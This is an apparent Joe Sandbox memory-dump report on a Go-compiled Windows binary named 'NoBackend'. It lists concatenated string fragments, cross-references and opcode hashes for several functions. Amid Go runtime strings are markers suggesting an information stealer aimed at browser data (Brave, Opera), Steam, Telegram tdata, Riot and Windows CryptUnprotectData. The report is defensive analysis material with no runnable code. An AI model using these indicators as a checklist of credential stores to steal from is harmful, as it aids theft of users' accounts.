gc %: gp *(in n= ) P MPC= < end > ]:???pc= G$%dSETadxaesshaavxfmakey///%25Viaudpdns::1setcgoftpssh204206304400500net): MD4MD5RSADSAURITTL: ` Lazerich%s%stypename`%d`text`%s`.ziptrueDataLogsRiotJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDT, xrefs: 00B6AEF4
ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32, xrefs: 00B6B085
ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=, xrefs: 00B6B28B
MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException , xrefs: 00B6B305
failed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedcould not find QP, xrefs: 00B6B518
gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:sse41sse42ssse3tls: Earlyparsehostsfilesimap2imap3imapspop3sutf-8%s*%dtext/bad nSHA-1P-224P-256P-384P-521ECDSA (at Classmatchrune inlinefieldsauthorfooterembeds`None`StringFormat[], xrefs: 00B6A95A
MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, xrefs: 00B6B345
MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (goal , cons/mark maxTrigger= pages/byte s.sweepgen= allocCount end tracegcbad g0 stackself-preempt [recovered]bad recoverybad g , xrefs: 00B6B325
gc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foun, xrefs: 00B6B529

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:$ MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException $ MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (goal , cons/mark maxTrigger= pages/byte s.sweepgen= allocCount end tracegcbad g0 stackself-preempt [recovered]bad recoverybad g $ ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32$ ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=$.$failed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedcould not find QP$gc %: gp *(in n= ) P MPC= < end > ]:???pc= G$%dSETadxaesshaavxfmakey///%25Viaudpdns::1setcgoftpssh204206304400500net): MD4MD5RSADSAURITTL: ` Lazerich%s%stypename`%d`text`%s`.ziptrueDataLogsRiotJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDT$gc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foun$gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:sse41sse42ssse3tls: Earlyparsehostsfilesimap2imap3imapspop3sutf-8%s*%dtext/bad nSHA-1P-224P-256P-384P-521ECDSA (at Classmatchrune inlinefieldsauthorfooterembeds`None`StringFormat[]
API String ID: 0-2515545930
Opcode ID: bc5b57494e79f2d1c3d63cd7ca23e75d833624eaa885df146b301303ab7c46c2
Instruction ID: d1bdf5c9e74cf4ca3f3724e37c26be11f551db45faefab59d941213b55f305d3
Opcode Fuzzy Hash: bc5b57494e79f2d1c3d63cd7ca23e75d833624eaa885df146b301303ab7c46c2
Instruction Fuzzy Hash: 5C62C036619B80C5EB15EF25F8813EAB3A5F78AB84F448562DA8D5376ADF7CC484C700

Uniqueness

Uniqueness Score: -1.00%

Function 00B9EF80 Relevance: 12.9, Strings: 10, Instructions: 369COMMON

Download Yara Rule

Strings

untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:length too large()<>@,;:\"/[]?= DuplicateTokenExGetCurrentThreadRtlVirtualUnwindGODEBUG: value "context canceled.WithValue(type SignatureScheme(no renegotiationContent-Languagehost, xrefs: 00B9F57D
runtime: pcdata is bad ABI descriptiondodeltimer: wrong Padjusttimers: bad punknown Go type: %vmultipartmaxheadersContent-Dispositionskip this directorySetTokenInformationMultiByteToWideCharunknown cipher typerevoked certificateexpired certificateunknown certi, xrefs: 00B9F2FD, 00B9F487
missing stackmapbad symbol tablenon-Go function not in ranges:length too large()<>@,;:\"/[]?= DuplicateTokenExGetCurrentThreadRtlVirtualUnwindGODEBUG: value "context canceled.WithValue(type SignatureScheme(no renegotiationContent-LanguagehostLookupOrder=/etc, xrefs: 00B9F439, 00B9F5CF
(targetpc= , plugin: runtime: g : frame.sp=created by Crypt32.dlli/o timeoutMoveFileExWNetShareAddNetShareDel.WithCanceltls: alert(local errorc e traffictraffic updApplicationIn-Reply-ToReturn-PathHTTPS_PROXYhttps_proxygocachehashgocachetestarchive/tarcrypto/, xrefs: 00B9F359, 00B9F4E8
locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangeasn1: cannot marshal nil valuemultipart/form-data; boundary=zip: error writing salt or pwvreflect: Len of non-array typeGODEBUG: unknown cpu, xrefs: 00B9F4C5
runtime: frame runtimer: bad ptraceback stuckRegCreateKeyExWRegDeleteValueWinvalid boolean0601021504Z0700non-minimal tagunknown Go typeImpersonateSelfOpenThreadTokenreflectlite.SetPKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512ClientAuthType(unknown versionrecor, xrefs: 00B9F3D4, 00B9F55A
untyped args out of range no module data in goroutine RegSetValueExWdata truncatedunreachable: Module32FirstW.WithDeadline(<not Stringer>bad record MACAccept-CharsetDkim-Signatureunknown mode: need more dataREQUEST_METHODmime/multipart\.+*?()|[]{}^$Resource, xrefs: 00B9F3F7
bad symbol tablenon-Go function not in ranges:length too large()<>@,;:\"/[]?= DuplicateTokenExGetCurrentThreadRtlVirtualUnwindGODEBUG: value "context canceled.WithValue(type SignatureScheme(no renegotiationContent-LanguagehostLookupOrder=/etc/resolv.confnon-, xrefs: 00B9F38A, 00B9F51B
and :***@Rangeallowrangehttps:path%s %q%s=%sHTTP/socksFound&"'GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilntohsdefersweepschedhchansudoggscanmheaptracepanicsleep cnt=gcing MB, got= ... max=scav ptr ] = (usage, xrefs: 00B9F31B, 00B9F4A5
args stack map entries for invalid runtime symbol tableruntime: no module data for [originating from goroutine asn1: string not valid UTF-8bytes: negative Repeat countabi.NewName: name too long: Ed25519 verification failuremalformed MIME header line: cannot u, xrefs: 00B9F336

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: (targetpc= , plugin: runtime: g : frame.sp=created by Crypt32.dlli/o timeoutMoveFileExWNetShareAddNetShareDel.WithCanceltls: alert(local errorc e traffictraffic updApplicationIn-Reply-ToReturn-PathHTTPS_PROXYhttps_proxygocachehashgocachetestarchive/tarcrypto/$ and :***@Rangeallowrangehttps:path%s %q%s=%sHTTP/socksFound&"'GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilntohsdefersweepschedhchansudoggscanmheaptracepanicsleep cnt=gcing MB, got= ... max=scav ptr ] = (usage$ args stack map entries for invalid runtime symbol tableruntime: no module data for [originating from goroutine asn1: string not valid UTF-8bytes: negative Repeat countabi.NewName: name too long: Ed25519 verification failuremalformed MIME header line: cannot u$ locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangeasn1: cannot marshal nil valuemultipart/form-data; boundary=zip: error writing salt or pwvreflect: Len of non-array typeGODEBUG: unknown cpu$ untyped args out of range no module data in goroutine RegSetValueExWdata truncatedunreachable: Module32FirstW.WithDeadline(<not Stringer>bad record MACAccept-CharsetDkim-Signatureunknown mode: need more dataREQUEST_METHODmime/multipart\.+*?()|[]{}^$Resource$ untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:length too large()<>@,;:\"/[]?= DuplicateTokenExGetCurrentThreadRtlVirtualUnwindGODEBUG: value "context canceled.WithValue(type SignatureScheme(no renegotiationContent-Languagehost$bad symbol tablenon-Go function not in ranges:length too large()<>@,;:\"/[]?= DuplicateTokenExGetCurrentThreadRtlVirtualUnwindGODEBUG: value "context canceled.WithValue(type SignatureScheme(no renegotiationContent-LanguagehostLookupOrder=/etc/resolv.confnon-$missing stackmapbad symbol tablenon-Go function not in ranges:length too large()<>@,;:\"/[]?= DuplicateTokenExGetCurrentThreadRtlVirtualUnwindGODEBUG: value "context canceled.WithValue(type SignatureScheme(no renegotiationContent-LanguagehostLookupOrder=/etc$runtime: frame runtimer: bad ptraceback stuckRegCreateKeyExWRegDeleteValueWinvalid boolean0601021504Z0700non-minimal tagunknown Go typeImpersonateSelfOpenThreadTokenreflectlite.SetPKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512ClientAuthType(unknown versionrecor$runtime: pcdata is bad ABI descriptiondodeltimer: wrong Padjusttimers: bad punknown Go type: %vmultipartmaxheadersContent-Dispositionskip this directorySetTokenInformationMultiByteToWideCharunknown cipher typerevoked certificateexpired certificateunknown certi
API String ID: 0-669627558
Opcode ID: c356595d26956c7f0d107e9bde836c1218e0d03bcfe08be9871d207176559058
Instruction ID: 362637add092cf83d457fd9bccb441a5641de3a4ba5bd6bcb3e2475a363b21dd
Opcode Fuzzy Hash: c356595d26956c7f0d107e9bde836c1218e0d03bcfe08be9871d207176559058
Instruction Fuzzy Hash: 66F18036218BC186DF20EF65E4803AAB3A5F788B94F544572EE9D47B26DF39C944CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B6FD20 Relevance: 7.7, Strings: 6, Instructions: 176COMMON

Download Yara Rule

Strings

found at *( s.elemsize= B (goal , cons/mark maxTrigger= pages/byte s.sweepgen= allocCount end tracegcbad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gs, xrefs: 00B6FF05
marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [missing deferreturnpanic during mallocpanic holding lockspanic during panic, g->atomics, xrefs: 00B6FF9E
objgc %: gp *(in n= ) P MPC= < end > ]:???pc= G$%dSETadxaesshaavxfmakey///%25Viaudpdns::1setcgoftpssh204206304400500net): MD4MD5RSADSAURITTL: ` Lazerich%s%stypename`%d`text`%s`.ziptrueDataLogsRiotJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTA, xrefs: 00B6FF76
runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflo, xrefs: 00B6FEE7
greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has, xrefs: 00B6FFAF
base of ) = <==GOGC] = pc=: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal, xrefs: 00B6FF5B

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: found at *( s.elemsize= B (goal , cons/mark maxTrigger= pages/byte s.sweepgen= allocCount end tracegcbad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gs$base of ) = <==GOGC] = pc=: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal$greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has$marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [missing deferreturnpanic during mallocpanic holding lockspanic during panic, g->atomics$objgc %: gp *(in n= ) P MPC= < end > ]:???pc= G$%dSETadxaesshaavxfmakey///%25Viaudpdns::1setcgoftpssh204206304400500net): MD4MD5RSADSAURITTL: ` Lazerich%s%stypename`%d`text`%s`.ziptrueDataLogsRiotJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTA$runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflo
API String ID: 0-2774666052
Opcode ID: 2dc3d03a2833808f7d95ae7cf1d8fe6cb570ed148326a437aadf89438bbfe4e2
Instruction ID: a8f0486adbeefb2acc2ad82f5dbac00445c53f8308c0e18bbb80f46e675ae2dd
Opcode Fuzzy Hash: 2dc3d03a2833808f7d95ae7cf1d8fe6cb570ed148326a437aadf89438bbfe4e2
Instruction Fuzzy Hash: FC61D072714B8086DB10AF11F4403ADABA5F749BD0F4855A6EF9E07BA6CB7CC594C700

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9F60 Relevance: 6.7, Strings: 5, Instructions: 440COMMON

Download Yara Rule

Strings

pc=: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal+0530+0430+0545+0630+033, xrefs: 00BAA5D2
non-Go function at pc=%SystemRoot%\system32\zero length BIT STRINGzip: file closed twiceRtlLookupFunctionEntryCreateEnvironmentBlockreflectlite.Value.ElemECDSAWithP256AndSHA256ECDSAWithP384AndSHA384ECDSAWithP521AndSHA512error decoding messageinappropriate fall, xrefs: 00BAA6E5
...\\.\??'"'Getagevia200404443tcp://0,h1newACKNUL:\/HanLaoMroNkoVaifinobjgc %: gp *(in n= ) P MPC= < end > ]:???pc= G$%dSETadxaesshaavxfmakey///%25Viaudpdns::1setcgoftpssh204206304400500net): MD4MD5RSADSAURITTL: ` Lazerich%s%stypename, xrefs: 00BAA3D2
sp= sp: lr: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930BraveOperaLaze, xrefs: 00BAA5B2
fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930BraveOperaLaze1Laze2URL: L, xrefs: 00BAA592

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930BraveOperaLaze1Laze2URL: L$ pc=: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal+0530+0430+0545+0630+033$ sp= sp: lr: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930BraveOperaLaze$...\\.\??'"'Getagevia200404443tcp://0,h1newACKNUL:\/HanLaoMroNkoVaifinobjgc %: gp *(in n= ) P MPC= < end > ]:???pc= G$%dSETadxaesshaavxfmakey///%25Viaudpdns::1setcgoftpssh204206304400500net): MD4MD5RSADSAURITTL: ` Lazerich%s%stypename$non-Go function at pc=%SystemRoot%\system32\zero length BIT STRINGzip: file closed twiceRtlLookupFunctionEntryCreateEnvironmentBlockreflectlite.Value.ElemECDSAWithP256AndSHA256ECDSAWithP384AndSHA384ECDSAWithP521AndSHA512error decoding messageinappropriate fall
API String ID: 0-529194116
Opcode ID: e8afd0b7d62cdc6ed88ad28952a4cdfa9b3d205df84d781c77dcaa38292aaadf
Instruction ID: 8cba5aeef86fbfee41a8f3d06b9b76d0faa55e36457712880ed1a79e2ee493f3
Opcode Fuzzy Hash: e8afd0b7d62cdc6ed88ad28952a4cdfa9b3d205df84d781c77dcaa38292aaadf
Instruction Fuzzy Hash: AA123A3621CBC086DB609B25F4843AEB7A5F7CAB80F5441A6EE8D47B69CF39C444CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B88220 Relevance: 6.5, Strings: 5, Instructions: 299COMMON

Download Yara Rule

Strings

invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:length too large()<>@,;:\"/[]?= DuplicateTokenExGetCurrentThreadRtlVirtualUnwindGODEBUG: value "cont, xrefs: 00B88739
runtime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupCryptUnprotectDatanon-minimal lengthtruncated sequencesequence, xrefs: 00B88651
, goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type nil keyderivedInitialExpiresSubjectwsarecvwsasendlookup charsetos/execruntimeSHA-224SHA-256SHA-384S, xrefs: 00B8866F, 00B886F7
suspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function sql: RawBytes isn't allowed on Row.Scantags don't match (%d vs %+v) %+v %s @%dasn1: Unmarshal recipient , xrefs: 00B8874A
